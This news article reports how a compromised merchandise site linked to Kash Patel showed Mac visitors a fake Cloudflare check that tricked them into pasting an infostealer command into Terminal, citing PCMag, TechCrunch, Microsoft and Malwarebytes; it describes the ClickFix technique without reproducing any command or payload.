Mac users tricked by fake Cloudflare

On May 22, reports from PCMag, Yahoo Tech and TechCrunch said visitors to BasedApparel.com, a political merchandise site linked to FBI Director Kash Patel, were intermittently shown a fake Cloudflare verification page that targeted Mac users. The page told users to prove they were human by opening Terminal and pasting a copied string, according to PCMag’s account of the attack. Researchers said the copied text was not a harmless verification code but an obfuscated command that fetched malware. By Friday, TechCrunch reported the site had been taken offline after the reports. ### How did the fake Cloudflare page work? PCMag reported that the site displayed a page styled as a Cloudflare warning with the message “Unusual Web Traffic Detected” and instructions to verify the visitor was human. The page told users to click a “Copy” button and then paste the result into Terminal on macOS. The copied text, PCMag said, only appeared to be a short verification phrase. (tech.yahoo.com) In practice, the button copied a longer hidden command. Yahoo Tech said the command was base64-encoded and, once pasted into Terminal, downloaded an AppleScript-based infostealer aimed at browser passwords and cryptocurrency wallets. ### Why would a user run a command from a website? Cloudflare is a widely used web security service, and the fake page borrowed that trust. (tech.yahoo.com) PCMag said the attack used a “ClickFix”-style method, in which a site presents a problem and then gives the victim a supposed fix that is actually malicious. Malwarebytes said this technique does not rely on a browser exploit or a poisoned app download. (tech.yahoo.com) Its March 26 research on Infiniti Stealer said fake CAPTCHA or verification pages instead persuade users to open Terminal, paste a command and press Return, starting the infection by the user’s own action. ### Why does Terminal matter so much in these attacks? (tech.yahoo.com) Microsoft said on May 6 that recent ClickFix campaigns targeting macOS use Terminal commands to retrieve remotely hosted content and launch script-based loaders. Microsoft said that differs from the usual app-install flow because scripts run directly through Terminal do not go through the same Gatekeeper checks that can apply to application bundles opened in Finder. (malwarebytes.com) That distinction helps explain why the lure is effective. A user is not being asked to install a visible app from a disk image. The user is being told to run what looks like a verification step, while the command pulls down the next stage from attacker-controlled infrastructure, according to Microsoft and PCMag. ### What malware was involved here? (microsoft.com) Researcher “debbie,” quoted by PCMag and Yahoo Tech, described the payload as “a classic infostealer, wrapped twice in base64.” PCMag said she recovered the shell script and that VirusTotal detections flagged it as malicious, including Trojan and infostealer classifications. Yahoo Tech said 27 antivirus engines flagged the payload. (microsoft.com) Malwarebytes and Microsoft have both documented a broader rise in macOS ClickFix campaigns in 2026. Malwarebytes said Infiniti Stealer uses fake verification pages to get users to run commands themselves, while Microsoft said related campaigns have delivered Macsync, Shub Stealer and AMOS. Both firms said the malware can steal credentials, wallet data and other sensitive files. (tech.yahoo.com) ### Was the site itself the attacker? TechCrunch reported that Based Apparel’s website was taken offline on Friday after reports that it had been hijacked by hackers trying to infect visitors with malware. Yahoo Tech also said the site appeared compromised rather than intentionally malicious, describing that as a common pattern in ClickFix incidents where attackers abuse legitimate websites. (malwarebytes.com) PCMag said the site is part of a merchandise brand Patel co-created with Andrew Ollis before Patel became FBI director. TechCrunch said Based Apparel could not be reached for comment and that an email sent to a Gmail address previously associated with Patel did not receive a response. ### What should Mac users watch for next? Apple’s current macOS releases include warnings when users paste potentially dangerous commands into Terminal, Yahoo Tech reported. (tech.yahoo.com) But Microsoft’s May 6 research and Malwarebytes’ March 26 report both indicate that ClickFix-style social engineering against Mac users is still spreading across compromised or attacker-controlled sites. (tech.yahoo.com) As of May 22, the immediate next step in this case was the site outage. The broader next step is likely to come from vendor advisories and threat-research updates from Microsoft, Malwarebytes and other security firms tracking ClickFix activity on macOS. (tech.yahoo.com 1) (tech.yahoo.com 2)